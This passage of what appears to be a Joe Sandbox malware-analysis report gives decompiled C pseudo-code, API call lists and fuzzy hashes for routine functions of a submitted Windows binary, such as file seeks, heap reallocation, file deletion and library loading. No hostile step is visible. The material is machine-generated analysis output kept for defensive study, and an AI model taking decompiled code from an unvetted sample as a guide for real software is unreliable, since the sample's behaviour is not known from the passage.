				_t22 = _t21 | 0xffffffff;
				if( *(_t34 + 4) != _t22) {
					L3:
					_v4 = _v4 & 0x00000000;
					_t12 = SetFilePointer( *(_t34 + 4), 0,  &_v4, 1); // executed
					_t32 = _t12;
					if(_t32 != _t22 || GetLastError() == 0) {
						L7:
						asm("cdq");
						_t14 = 0 + _t32;
						asm("adc edx, 0x0");
						goto L8;
					} else {
						if( *((char*)(_t34 + 0x1a)) == 0) {
							_t14 = _t22;
							L8:
							return _t14;
						}
						E00A06F92(0xa40f50, 0xa40f50, _t34 + 0x24);
						goto L7;
					}
				}
				if( *((char*)(_t34 + 0x1a)) == 0) {
					return _t22;
				}
				E00A06F92(0xa40f50, 0xa40f50, _t34 + 0x24);
				goto L3;
			}













                                                        0x00a09fe4
                                                        0x00a09fe6
                                                        0x00a09ff1
                                                        0x00a0a004
                                                        0x00a0a004
                                                        0x00a0a016
                                                        0x00a0a01c
                                                        0x00a0a020
                                                        0x00a0a03d
                                                        0x00a0a043
                                                        0x00a0a048
                                                        0x00a0a04a
                                                        0x00000000
                                                        0x00a0a02c
                                                        0x00a0a030
                                                        0x00a0a059
                                                        0x00a0a04d
                                                        0x00000000
                                                        0x00a0a04d
                                                        0x00a0a038
                                                        0x00000000
                                                        0x00a0a038
                                                        0x00a0a020
                                                        0x00a09ff7
                                                        0x00000000
                                                        0x00a0a055
                                                        0x00a09fff
                                                        0x00000000

                                                        APIs
                                                        • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00A0A016
                                                        • GetLastError.KERNEL32 ref: 00A0A022
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastPointer
                                                        • String ID:
                                                        • API String ID: 2976181284-0
                                                        • Opcode ID: c635ed2161317994cb31775f8902e61bdf6031c8321e9c5d0a39e7699572b7ba
                                                        • Instruction ID: abe48f6304ab304e03052b5405f5efab304dc66066386d7b8f01bb68b885f4a2
                                                        • Opcode Fuzzy Hash: c635ed2161317994cb31775f8902e61bdf6031c8321e9c5d0a39e7699572b7ba
                                                        • Instruction Fuzzy Hash: 0801DE7270430C6BEB349F29EC44B67B7E9AB94315F10893EB247C22C0CA38ED0C8612
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A28926 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        C-Code - Quality: 96%
                                                        			E00A28926(void* __ecx, void* __edx, void* _a4, long _a8) {
				void* __esi;
				void* _t4;
				long _t7;
				void* _t9;
				void* _t13;
				void* _t14;
				long _t16;

				_t13 = __edx;
				_t10 = __ecx;
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 = _a8;
					__eflags = _t16;
					if(_t16 != 0) {
						__eflags = _t16 - 0xffffffe0;
						if(_t16 <= 0xffffffe0) {
							while(1) {
								_t4 = HeapReAlloc( *0xa616ec, 0, _t14, _t16);
								__eflags = _t4;
								if(_t4 != 0) {
									break;
								}
								__eflags = E00A286B4();
								if(__eflags == 0) {
									goto L5;
								}
								_t7 = E00A2749D(_t10, _t13, _t16, __eflags, _t16);
								_pop(_t10);
								__eflags = _t7;
								if(_t7 == 0) {
									goto L5;
								}
							}
							L7:
							return _t4;
						}
						L5:
						 *((intOrPtr*)(E00A28C7A())) = 0xc;
						L6:
						_t4 = 0;
						__eflags = 0;
						goto L7;
					}
					E00A287FE(_t14);
					goto L6;
				}
				_t9 = E00A28838(__ecx, _a8); // executed
				return _t9;
			}










                                                        0x00a28926
                                                        0x00a28926
                                                        0x00a2892c
                                                        0x00a28931
                                                        0x00a2893f
                                                        0x00a28942
                                                        0x00a28944
                                                        0x00a2894f
                                                        0x00a28952
                                                        0x00a28979
                                                        0x00a28983
                                                        0x00a28989
                                                        0x00a2898b
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2896a
                                                        0x00a2896c
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2896f
                                                        0x00a28974
                                                        0x00a28975
                                                        0x00a28977
                                                        0x00000000
                                                        0x00000000
                                                        0x00a28977
                                                        0x00a28961
                                                        0x00000000
                                                        0x00a28961
                                                        0x00a28954
                                                        0x00a28959
                                                        0x00a2895f
                                                        0x00a2895f
                                                        0x00a2895f
                                                        0x00000000
                                                        0x00a2895f
                                                        0x00a28947
                                                        0x00000000
                                                        0x00a2894c
                                                        0x00a28936
                                                        0x00000000

                                                        APIs
                                                        • _free.LIBCMT ref: 00A28947
                                                          • Part of subcall function 00A28838: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A23CF6,?,0000015D,?,?,?,?,00A251D2,000000FF,00000000,?,?), ref: 00A2886A
                                                        • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00A40F50,00A0D11F,?,?,?,?,?,?), ref: 00A28983
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocAllocate_free
                                                        • String ID:
                                                        • API String ID: 2447670028-0
                                                        • Opcode ID: 627cb314ec55438961ffad5a67d734de4df74d423d2143c78fadd7f2fc3ea242
                                                        • Instruction ID: b0188d68d5b2d64c57bc0a94ed25160fbec3aa02d40c3148cc628735f14b78ae
                                                        • Opcode Fuzzy Hash: 627cb314ec55438961ffad5a67d734de4df74d423d2143c78fadd7f2fc3ea242
                                                        • Instruction Fuzzy Hash: FEF068321071357ADB21275DBD00F7B3B6C9F917B0B148135F82467191DF2C988155A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A10BE3 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A10BE3(void* __ecx) {
				long _v8;
				long _v12;
				int _t8;
				void* _t14;
				signed int _t15;
				signed int _t17;

				_t8 = GetProcessAffinityMask(GetCurrentProcess(),  &_v8,  &_v12); // executed
				if(_t8 == 0) {
					return _t8 + 1;
				}
				_t14 = 0;
				_t17 = _v8;
				_t15 = 1;
				do {
					if((_t17 & _t15) != 0) {
						_t14 = _t14 + 1;
					}
					_t15 = _t15 + _t15;
				} while (_t15 != 0);
				if(_t14 >= 1) {
					return _t14;
				}
				return 1;
			}









                                                        0x00a10bf7
                                                        0x00a10bff
                                                        0x00000000
                                                        0x00a10c01
                                                        0x00a10c06
                                                        0x00a10c0a
                                                        0x00a10c0d
                                                        0x00a10c0f
                                                        0x00a10c11
                                                        0x00a10c13
                                                        0x00a10c13
                                                        0x00a10c14
                                                        0x00a10c14
                                                        0x00a10c1b
                                                        0x00000000
                                                        0x00a10c1d
                                                        0x00a10c22

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(?,?), ref: 00A10BF0
                                                        • GetProcessAffinityMask.KERNEL32 ref: 00A10BF7
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: Process$AffinityCurrentMask
                                                        • String ID:
                                                        • API String ID: 1231390398-0
                                                        • Opcode ID: 4e6dafe33faba6ea6bdae204db22448c43c3afd9cb697336e26e3f754753e30e
                                                        • Instruction ID: ce2882e149c4666872748025f80ec648143ed6e45a08ed204a0fe0a115298eee
                                                        • Opcode Fuzzy Hash: 4e6dafe33faba6ea6bdae204db22448c43c3afd9cb697336e26e3f754753e30e
                                                        • Instruction Fuzzy Hash: E3E09276A0410AE74F08C7A49C05CEBB3ADDA252007204279F903D3600F970DEC24AE0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A0A637 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 82%
                                                        			E00A0A637(WCHAR* _a4, long _a8) {
				short _v4100;
				int _t12;
				signed int _t18;
				signed int _t19;

				E00A1E630();
				_push(_t18);
				_t12 = SetFileAttributesW(_a4, _a8); // executed
				_t19 = _t18 & 0xffffff00 | _t12 != 0x00000000;
				if(_t19 == 0 && E00A0B85C(_a4,  &_v4100, 0x800) != 0) {
					_t19 = _t19 & 0xffffff00 | SetFileAttributesW( &_v4100, _a8) != 0x00000000;
				}
				return _t19;
			}







                                                        0x00a0a63f
                                                        0x00a0a644
                                                        0x00a0a64b
                                                        0x00a0a653
                                                        0x00a0a658
                                                        0x00a0a684
                                                        0x00a0a684
                                                        0x00a0a68d

                                                        APIs
                                                        • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00A0A46D,?,?,?,00A0A2B3,?,00000001,00000000,?,?), ref: 00A0A64B
                                                        • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00A0A46D,?,?,?,00A0A2B3,?,00000001,00000000,?,?), ref: 00A0A67C
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: 05d1ddf984e19e48144a00566006b23cf9c30499749081c9162ef094b8dc6518
                                                        • Instruction ID: c10cd0206e4048ede1edaa5a087108ea2d84222f8aa171e671ec4d224847d05d
                                                        • Opcode Fuzzy Hash: 05d1ddf984e19e48144a00566006b23cf9c30499749081c9162ef094b8dc6518
                                                        • Instruction Fuzzy Hash: FFF0A03125524D7BEF019FA0EC40BE9376CAB14382F488151BC88861A0DB328E99AA54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1D830 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: ItemText_swprintf
                                                        • String ID:
                                                        • API String ID: 3011073432-0
                                                        • Opcode ID: e9c132ce00d9b47294c6b98dabeeea87882fbd36fb31330813e6a2b5368babea
                                                        • Instruction ID: de638d98f2c56126b68d28bd2c2bb4228859cd2e14a111d16868c35721fb91eb
                                                        • Opcode Fuzzy Hash: e9c132ce00d9b47294c6b98dabeeea87882fbd36fb31330813e6a2b5368babea
                                                        • Instruction Fuzzy Hash: 32F0EC7550434C6AE711FFB0AD06FDF3B6CAB05345F040495B701570A3DA7669615761
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A0A320 Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 82%
                                                        			E00A0A320(WCHAR* _a4) {
				short _v4100;
				int _t10;
				signed int _t16;
				signed int _t17;

				E00A1E630();
				_push(_t16);
				_t10 = DeleteFileW(_a4); // executed
				_t17 = _t16 & 0xffffff00 | _t10 != 0x00000000;
				if(_t17 == 0 && E00A0B85C(_a4,  &_v4100, 0x800) != 0) {
					_t17 = _t17 & 0xffffff00 | DeleteFileW( &_v4100) != 0x00000000;
				}
				return _t17;
			}







                                                        0x00a0a328
                                                        0x00a0a32d
                                                        0x00a0a331
                                                        0x00a0a339
                                                        0x00a0a33e
                                                        0x00a0a367
                                                        0x00a0a367
                                                        0x00a0a370

                                                        APIs
                                                        • DeleteFileW.KERNELBASE(?,?,?,00A099EC,?,?,00A09825,?,?,?,?,00A31F81,000000FF), ref: 00A0A331
                                                        • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00A099EC,?,?,00A09825,?,?,?,?,00A31F81,000000FF), ref: 00A0A35F
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: DeleteFile
                                                        • String ID:
                                                        • API String ID: 4033686569-0
                                                        • Opcode ID: 1127b824cfba6ae8f42be2d3a9e1c2cf23ae1716d5e20503f5409243d3141065
                                                        • Instruction ID: a70f9a1ffed934665648180c1b6a153904adf67a675969f7ffc923c4f2a2fbfd
                                                        • Opcode Fuzzy Hash: 1127b824cfba6ae8f42be2d3a9e1c2cf23ae1716d5e20503f5409243d3141065
                                                        • Instruction Fuzzy Hash: 75E0923695021C6BDB00DFA0EC41FE9776CBB193C2F488065BC88D60A0DB219DD9AA65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1A62E Relevance: 3.0, APIs: 2, Instructions: 27comCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 37%
                                                        			E00A1A62E(void* __ecx) {
				intOrPtr _v16;
				intOrPtr* _t5;
				void* _t8;
				void* _t13;
				void* _t16;
				intOrPtr _t19;

				 *[fs:0x0] = _t19;
				_t5 =  *0xa48430; // 0x7442c100
				 *0xa33260(_t5, _t13, _t16,  *[fs:0x0], E00A31F81, 0xffffffff);
				 *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))();
				L00A1E50C(); // executed
				_t8 =  *0xa62174( *((intOrPtr*)(__ecx + 4))); // executed
				 *[fs:0x0] = _v16;
				return _t8;
			}









                                                        0x00a1a63f
                                                        0x00a1a646
                                                        0x00a1a657
                                                        0x00a1a65d
                                                        0x00a1a662
                                                        0x00a1a667
                                                        0x00a1a671
                                                        0x00a1a67c

                                                        APIs
                                                        • GdiplusShutdown.GDIPLUS(?,?,?,?,00A31F81,000000FF), ref: 00A1A662
                                                        • OleUninitialize.OLE32(?,?,?,?,00A31F81,000000FF), ref: 00A1A667
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: GdiplusShutdownUninitialize
                                                        • String ID:
                                                        • API String ID: 3856339756-0
                                                        • Opcode ID: 1a2e88a01c5299df276305c3c82c9c4a8630713d468ff9ad63dd7783669e0aa6
                                                        • Instruction ID: b36e09c8c4f1d546f1d34352238869d2b1adc616507580ae629b2fee6e64a930
                                                        • Opcode Fuzzy Hash: 1a2e88a01c5299df276305c3c82c9c4a8630713d468ff9ad63dd7783669e0aa6
                                                        • Instruction Fuzzy Hash: 06F06576618654EFC715EB8DDD05B59FBB9FB89B20F00436AF41983760CB756801CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A0A387 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A0A387(WCHAR* _a4) {
				short _v4100;
				long _t6;
				long _t11;
				long _t13;

				E00A1E630();
				_t6 = GetFileAttributesW(_a4); // executed
				_t13 = _t6;
				if(_t13 == 0xffffffff && E00A0B85C(_a4,  &_v4100, 0x800) != 0) {
					_t11 = GetFileAttributesW( &_v4100); // executed
					_t13 = _t11;
				}
				return _t13;
			}







                                                        0x00a0a38f
                                                        0x00a0a398
                                                        0x00a0a39e
                                                        0x00a0a3a3
                                                        0x00a0a3c4
                                                        0x00a0a3ca
                                                        0x00a0a3ca
                                                        0x00a0a3d2

                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(?,?,?,00A0A37C,?,00A07776,?,?,?,?), ref: 00A0A398
                                                        • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00A0A37C,?,00A07776,?,?,?,?), ref: 00A0A3C4
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: 8abf85e43dcca912dfc74a7bb58f588605aed936f4a3cc28bb71cf109fc9c788
                                                        • Instruction ID: 03a2dce82cc26d551d251b4ff666fba744da3b4427c4211d5fa9d56d44ec191d
                                                        • Opcode Fuzzy Hash: 8abf85e43dcca912dfc74a7bb58f588605aed936f4a3cc28bb71cf109fc9c788
                                                        • Instruction Fuzzy Hash: 9EE0923690422C5BDB10EBA8EC04BD9BB6CEB193E1F0042A1FD58D72D1D7709D889BE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A10360 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A10360(intOrPtr _a4) {
				short _v4100;
				struct HINSTANCE__* _t7;

				E00A1E630();
				_t7 = GetSystemDirectoryW( &_v4100, 0x800);
				_t14 = _t7;
				if(_t7 != 0) {
					E00A0BB55(_t14,  &_v4100, _a4,  &_v4100, 0x800); // executed
					_t7 = LoadLibraryW( &_v4100); // executed
				}
				return _t7;
			}





                                                        0x00a10368
                                                        0x00a1037b
                                                        0x00a10381
                                                        0x00a10383
                                                        0x00a10391
                                                        0x00a1039d
                                                        0x00a1039d
                                                        0x00a103a7

                                                        APIs
                                                        • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A1037B
                                                        • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A0EE61,Crypt32.dll,00000000,00A0EEE5,?,?,00A0EEC7,?,?,?), ref: 00A1039D
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: DirectoryLibraryLoadSystem
                                                        • String ID:
                                                        • API String ID: 1175261203-0
                                                        • Opcode ID: 116a5ee88e8925b3aeb97ce8487a43f33f9de931fc332b9a7d47e372c9093ab7
                                                        • Instruction ID: de6e58e228f03245235dc3195ce846a91b19cd385ad7604c0364a097c697e1ad
                                                        • Opcode Fuzzy Hash: 116a5ee88e8925b3aeb97ce8487a43f33f9de931fc332b9a7d47e372c9093ab7
                                                        • Instruction Fuzzy Hash: 80E0127691516C6BDB11DBD4ED04FD6776CEF19382F4400A5B948D2104DAB49A848BB4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A19D6F Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 73%
                                                        			E00A19D6F(signed int __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _t10;
				signed int _t15;

				_push(__ecx);
				_t15 = __ecx;
				_t10 =  &_v8;
				_v8 = __ecx;
				_v8 = _v8 & 0x00000000;
				_push(_t10);
				_push(_a4);
				 *__ecx = 0xa34670;
				if(_a8 == 0) {
					L00A1E4F4(); // executed
				} else {
					L00A1E4FA();
				}
				 *((intOrPtr*)(_t15 + 8)) = _t10;
				 *(_t15 + 4) = _v8;
				return _t15;
			}






                                                        0x00a19d72
                                                        0x00a19d74
                                                        0x00a19d76
                                                        0x00a19d79
                                                        0x00a19d7c
                                                        0x00a19d84
                                                        0x00a19d85
                                                        0x00a19d88
                                                        0x00a19d8e
                                                        0x00a19d97
                                                        0x00a19d90
                                                        0x00a19d90
                                                        0x00a19d90
                                                        0x00a19d9c
                                                        0x00a19da2
                                                        0x00a19dab

                                                        APIs
                                                        • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00A19D90
                                                        • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00A19D97
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: BitmapCreateFromGdipStream
                                                        • String ID:
                                                        • API String ID: 1918208029-0
                                                        • Opcode ID: 3ce06d05b29f64da7a2cc344af8872656574c8a12d704748732ce8b2479dd422
                                                        • Instruction ID: dfee3a89227f1236d893a67c9379ec8b5e5ceae4f27fcd0aaa785261486a0c59
                                                        • Opcode Fuzzy Hash: 3ce06d05b29f64da7a2cc344af8872656574c8a12d704748732ce8b2479dd422
                                                        • Instruction Fuzzy Hash: FDE0ED75905218EBCB20EF98D501ADEBBF8EB08711F10805BE84997201E7B1AE44DB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A223FC Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 89%
                                                        			E00A223FC(void* __ecx, void* __eflags) {
				intOrPtr _t1;
				void* _t2;
				void* _t9;

				_t1 = E00A23567(__eflags, E00A22340); // executed
				 *0xa3e680 = _t1;
				if(_t1 != 0xffffffff) {
					_t2 = E00A23615(__eflags, _t1, 0xa61054);
					_pop(_t9);
					__eflags = _t2;
					if(_t2 != 0) {
						return 1;
					} else {
						E00A2242F(_t9);
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}






                                                        0x00a22401
                                                        0x00a22406
                                                        0x00a2240f
                                                        0x00a2241a
                                                        0x00a22420
                                                        0x00a22421
                                                        0x00a22423
                                                        0x00a2242e
                                                        0x00a22425
                                                        0x00a22425
                                                        0x00000000
                                                        0x00a22425
                                                        0x00a22411
                                                        0x00a22411
                                                        0x00a22413
                                                        0x00a22413

                                                        APIs
                                                          • Part of subcall function 00A23567: try_get_function.LIBVCRUNTIME ref: 00A2357C
                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A2241A
                                                        • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00A22425
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
